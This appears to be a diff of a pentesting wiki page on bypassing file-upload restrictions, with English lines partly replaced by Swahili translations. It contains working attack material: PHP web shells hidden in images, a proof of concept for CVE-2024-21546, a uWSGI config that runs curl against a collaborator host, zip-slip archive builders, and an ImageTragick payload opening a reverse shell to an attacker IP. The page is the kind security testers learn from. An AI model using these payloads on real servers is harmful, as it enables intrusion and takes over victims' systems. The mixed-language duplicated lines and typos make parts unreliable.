4. Jaribu kupita vizingiti kwa **kudanganya parser ya extension** upande wa server kwa mbinu kama **kuzidisha** **extension** au **kuongeza data taka** (bytes **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa hapo awali kutayarisha payload bora._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
@ -40,18 +40,18 @@ Other useful extensions:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Add **another layer of extensions** to the previous check:
5. Ongeza **tabaka nyingine za extensions** kwa ukaguzi uliopita:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
6. Jaribu kuweka **exec extension before the valid extension** na kuomba server iwe misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
- _ex: file.php.png_
7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character ":” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. "file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The "**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.”)
8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
7. Kutumia **NTFS alternate data stream (ADS)** kwenye **Windows**. Katika kesi hii, tabia ya colon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa. Matokeo yake, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Mfano wa **::$data** pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya mfano huu pia inaweza kusaidia kupita vizingiti zaidi (mfano. "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatika. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check response how many characters it alllows. Let's say 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@ -59,33 +59,63 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA<--SNIP 232 A-->AAA.php.png
```
#### UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) CVE-2024-21546
Baadhi ya upload handlers huondoa au ku-normalize nukta zilizofuatia kwenye jina la faili lililosalazwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupita ukaguzi wa extension kwa:
- Kutumia MIME ya picha halali na magic header (mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuita faili iliyopakiwa kwa extension ya PHP ikifuatiwa na nukta, kwa mfano, `shell.php.`.
- Server huondoa nukta ya mwisho na kusababisha `shell.php` kuendelea kuwepo, ambayo itaendeshwa ikiwa imewekwa kwenye directory inayotumika kuwahudumia mtandao (default public storage like `/storage/files/`).
Minimal PoC (Burp Repeater):
```http
POST /profile/avatar HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="upload"; filename="0xdf.php."
Content-Type: image/png
\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--
```
Kisha fikia path iliyohifadhiwa (kawaida katika Laravel + LFM):
```
GET /storage/files/0xdf.php?cmd=id
```
Mitigations:
- Sasisha unisharp/laravel-filemanager hadi ≥ 2.9.1.
- Lazimisha allowlists kali upande wa server na thibitisha tena jina la faili lililohifadhiwa.
- Hudumia uploads kutoka maeneo yasiyoweza kutekelezwa.
### Bypass Content-Type, Magic Number, Compression & Resizing
- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
- Bypass **Content-Type** checks kwa kuweka **value** ya **Content-Type** **header** kuwa: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (kumdanganya amri ya _file_). Au ingiza shell ndani ya **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` or you could also **introduce the payload directly** in an image:\
`\` au pia unaweza **kuingiza payload moja kwa moja** ndani ya picha:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- Ikiwa **compression** inaongezwa kwenye picha yako, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu za hapo awali hazitakuwa na manufaa. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- Ukurasa wa wavuti pia unaweza kuwa unafanya **resizing** ya **image**, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- Mbinu nyingine ya kuunda payload inayoweza **kuishi baada ya image resizing**, kwa kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Other Tricks to check
- Find a vulnerability to **rename** the file already uploaded (to change the extension).
- Find a **Local File Inclusion** vulnerability to execute the backdoor.
- **Possible Information disclosure**:
1. Upload **several times** (and at the **same time**) the **same file** with the **same name**
2. Upload a file with the **name** of a **file** or **folder** that **already exists**
3. Uploading a file with **".”, "..”, or "…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in "/www/uploads/” directory, the ".” filename will create a file called "uploads” in the "/www/” directory.
4. Upload a file that may not be deleted easily such as **"…:.jpg”** in **NTFS**. (Windows)
5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows)
6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
- Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
- Tafuta udhaifu wa **kubadilisha jina** (rename) kwa faili iliyopakuliwa tayari (kubadilisha extension).
- Tafuta udhaifu wa **Local File Inclusion** ili kutekeleza backdoor.
- **Uwezekano wa ufunuo wa taarifa**:
1. Pakia **mara kadhaa** (na kwa **wakati ule ule**) **faili ile ile** yenye **jina lile lile**
2. Pakia faili yenye **jina** la **file** au **folder** ambayo **tayari ipo**
3. Kupakia faili yenye **"." , ".." , au "…" kama jina lake**. Kwa mfano, katika Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, faili yenye jina "." itaumba faili inayoitwa "uploads" katika directory ya "/www/".
4. Pakia faili ambayo inaweza kuwa ngumu kufutwa kama **"…:.jpg"** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** yenye **invalid characters** kama `|<>*?”` ndani ya jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina **yaleyalo yaliyohifadhiwa** (reserved/forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia **kuupload executable** (.exe) au **.html** (inayoonekana kidogo) ambayo **itaweza kutekeleza code** inapofunguliwa kwa bahati mbaya na mhusika.
### Special extension tricks
@ -98,17 +128,17 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
## **Jetty RCE**
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hivyo, kama ilivyoelezwa kwenye picha ifuatayo, pakia faili ya XML katika `$JETTY_BASE/webapps/` na tarajia shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
## **uWSGI RCE**
For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed.
Remote Command Execution (RCE) vulnerabilities zinaweza kutumiwa kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha `.ini` configuration file. uWSGI configuration files zinatumia sintaksia maalum kuingiza "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imeundwa kuingiza yaliyomo ya faili. Miongoni mwa schemes zinazotumiwa kwenye uWSGI, scheme ya "exec" ni yenye nguvu kabisa, ikiruhusu kusoma data kutoka kwenye standard output ya process. Kipengele hiki kinaweza kutumika kwa malengo mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati `.ini` configuration file inapotambuliwa.
Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes:
Tazama mfano ufuatao wa `uwsgi.ini` yenye madhara, ikionyesha schemes mbalimbali:
```ini
[uwsgi]
; read from a symbol
@ -126,14 +156,15 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
The execution of the payload occurs during the parsing of the configuration file. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or due to a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals upon detecting changes.
Utekelezaji wa payload hutokea wakati wa kuchambua faili ya configuration. Ili configuration ianzishwe na kuchambuliwa, mchakato wa uWSGI lazima uanzishwe upya (inawezekana baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa kwa auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinakokota (reload) faili kwa interval zilizobainishwa inapogundua mabadiliko.
Ni muhimu kuelewa upole wa parsing wa faili za configuration za uWSGI. Hasa, payload inayojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), na hivyo kupanua wigo wa udhaifu unaowezekana.
Ni muhimu kuelewa unyenyekevu wa namna uWSGI inavyokagua faili zake za configuration. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), na hivyo kupanua wigo wa uwezekano wa exploitation.
## **wget File Upload/SSRF Trick**
In some occasions you may find that a server is using **`wget`** to **kupakua mafaili** and you can **kuonyesha** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **hii ukaguzi inaweza kupitishwa.**\
The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**.
Kuna wakati unaweza kugundua kwamba server inatumia **`wget`** kupakua **faili** na unaweza **onyesha** **URL**. Katika kesi hizi, code inaweza kuwa inakagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba faili zinazoruhusiwa pekee ndizo zitakapopakuliwa. Hata hivyo, **ukaguzi huu unaweza kuepukika.**\
Urefu wa **kiasi cha juu** wa **jina la faili** kwenye **linux** ni **255**, hata hivyo, **wget** hukata majina ya faili hadi **236** herufi. Unaweza **pakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili lita **vuka** **ukaguzi** (kama katika mfano huu **".gif"** ni extension **halali**) lakini `wget` ata **badilisha jina** la faili kuwa **"A"\*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
@ -156,15 +187,15 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
2020-06-13 03:14:06 (1.96 MB/s) - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php saved [10/10]
```
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
Kumbuka kuwa **chaguo jingine** unachoweza kuwa unafikiria ili kuepuka ukaguzi huu ni kufanya **HTTP server i-redirect kwa faili tofauti**, hivyo URL ya awali itapita ukaguzi lakini wget itapakua faili iliyorejelewa iliyo na jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumiwa kwa **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorejelewa kwa jina la faili lililoonyeshwa kwenye URL ya awali**.
## Vifaa
## Zana
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu mechanisms za file upload. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kushambulia vunjo, ikihakikisha tathmini ya kina ya web applications.
### Corrupting upload indices with snprintf quirks (historical)
Some legacy upload handlers that use `snprintf()` or similar to build multi-file arrays from a single-file upload can be tricked into forging the `_FILES` structure. Due to inconsistencies and truncation in `snprintf()` behavior, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this “index corruption” pattern occasionally resurfaces in CTFs and older codebases.
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au mbinu zinazofanana kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda kwa ajili ya kuforgesha muundo wa `_FILES`. Kutokana na kutokuwepo kwa ulinganifu na kukatwa katika tabia ya `snprintf()`, upload moja iliyotengenezwa kwa uangalifu inaweza kuonekana kama faili nyingi zenye index upande wa server, ikachanganya mantiki inayodai muundo thabiti (mfano, kuitwa multi-file upload na kuchukua matawi yasiyo salama). Ingawa ni niche leo, muundo huu wa “index corruption” mara nyingi hujitokeza tena katika CTFs na codebases za zamani.
## From File upload to other vulnerabilities
@ -178,13 +209,13 @@ Some legacy upload handlers that use `snprintf()` or similar to build multi-file
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- Ikiwa unaweza kuagiza web server ichukue picha kutoka kwa URL unaweza kujaribu kutumika kwa SSRF. Ikiwa picha hii itahifadhiwa kwenye tovuti ya **public**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mgeni**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
- PDFs zilizotengenezwa kwa njia maalum kuelekea XSS: Ukurasa ufuatao unaelezea jinsi ya **kuingiza data ya PDF ili kupata utekelezaji wa JS** (the [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md)). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF itakayotekeleza JS yoyote kwa kufuata maelekezo yaliyotolewa.
- Pakia yaliyomo ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **size limit** wakati wa kupakia faili
Heres a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Hapa kuna orodha ya top 10 ya vitu unavyoweza kufanikisha kwa kupakia (kutoka [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
@ -206,37 +237,37 @@ https://github.com/portswigger/upload-scanner
## Magic Header Bytes
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Refer to [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) for other filetypes.
Rejea [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa aina nyingine za filetypes.
## Zip/Tar File Automatically decompressed Upload
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya mambo 2:
### Symlink
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
Pakia link inayojumuisha soft links kwenda kwa faili nyingine, kisha, ukiingia kwenye faili zilizofunguliwa utapata faili zilizounganishwa:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Decompress in different folders
### Dekompresi katika folda tofauti
Uundaji usiotarajiwa wa faili ndani ya folda wakati wa ufunguaji ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu ungeweza kuzuia OS-level command execution kupitia malicious file uploads, msaada wa compression wa hierarkia na uwezo wa directory traversal wa ZIP archive format unaweza kutumika vibaya. Hii inawawezesha washambulizi kupitisha vikwazo na kutoka kwenye folda za upload zilizo salama kwa kuyabadilisha kazi ya ufunguaji ya programu lengwa.
Uundaji usiotarajiwa wa faili katika saraka wakati wa dekompresi ni tatizo kubwa. Licha ya dhana za awali kwamba usanidi huu unaweza kulinda dhidi ya utekelezaji wa amri za OS kupitia upakiaji wa faili zenye madhara, msaada wa compression yenye muundo wa hieraki na uwezo wa directory traversal wa muundo wa ZIP unaweza kutumiwa. Hii inawawezesha wadukuzi kupitisha vikwazo na kutoroka kutoka kwa saraka salama za upload kwa kudanganya utendakazi wa dekompresi wa programu lengwa.
Exploit otomatiki ya kutengeneza faili hizo inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
An automated exploit to craft such files is available at [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). The utility can be used as shown:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Zaidi ya hayo, the **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, tengeneza symlink ya faili hiyo kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa operesheni yake.
Zaidi ya hayo, chaguo la **symlink trick with evilarc** pia liko. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kuwa evilarc haitakutana na makosa wakati wa uendeshaji wake.
Hapo chini kuna mfano wa Python code inayotumika kuunda malicious zip file:
Hapa chini kuna mfano wa Python code inayotumika kuunda faili ya zip yenye madhara:
```python
#!/usr/bin/python
import zipfile
@ -254,11 +285,11 @@ zip.close()
create_zip()
```
**Kunyanyasa ukandamizaji kwa file spraying**
**Kunyanyasa kompresi kwa file spraying**
Kwa maelezo zaidi **angalia chapisho la awali katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **Creating a PHP Shell**: PHP code imeandikwa kutekeleza amri zinazopitishwa kupitia `$_REQUEST`.
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia `$_REQUEST`.
```php
<?php
@ -268,14 +299,14 @@ system($cmd);
}?>
```
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaundwa na archive ya zip inatengenezwa ikijumuisha faili hizi.
2. **File Spraying and Compressed File Creation**: Faili nyingi zimetengenezwa na archive ya zip imeundwa ikijumuisha faili hizi.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwa directories.
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip hubadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kuvuka direktori.
```bash
:set modifiable
@ -285,38 +316,38 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
## ImageTragic
Pakia yaliyomo haya ukiwa na extension ya image ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (from the [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya kwa ugani wa image ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (kutokana na [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Kuingiza PHP Shell kwenye PNG
## Kuingiza PHP shell kwenye PNG
Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupita kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Fungsheni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani kawaida hutumika kwa kubadilisha ukubwa (resizing) na kurejesha sampuli (resampling) picha, mtawalia. Uwezo wa PHP shell iliyowekwa kubaki bila kuathiriwa na operesheni hizi ni faida kubwa kwa matumizi fulani.
Kuingiza PHP shell ndani ya IDAT chunk ya faili la PNG kunaweza kupita kwa ufanisi baadhi ya michakato ya usindikaji wa picha. Funsi za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD ni muhimu hasa katika muktadha huu, kwani kwa kawaida hutumika kwa resizing na resampling za picha, mtawalia. Uwezo wa PHP shell iliyowekwa kubaki bila kuathiriwa na shughuli hizi ni faida kubwa kwa matumizi fulani.
Uchambuzi wa kina wa mbinu hii, ikiwa ni pamoja na metodolojia yake na matumizi yanayowezekana, umetolewa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa wa kina wa mchakato na athari zake.
Uchambuzi wa kina wa mbinu hii, pamoja na metodología na matumizi yake yanayowezekana, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa ufahamu mpana wa mchakato na athari zake.
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Polyglot Files
## Faili za polyglot
Polyglot Files hutumika kama chombo maalum katika security, zikiw behaving kama chameleons zinazoweza kuwepo kwa uhalali katika miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na pia kama RAR archive. Faili hizo hazizuiliki kwa mchanganyiko huo tu; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
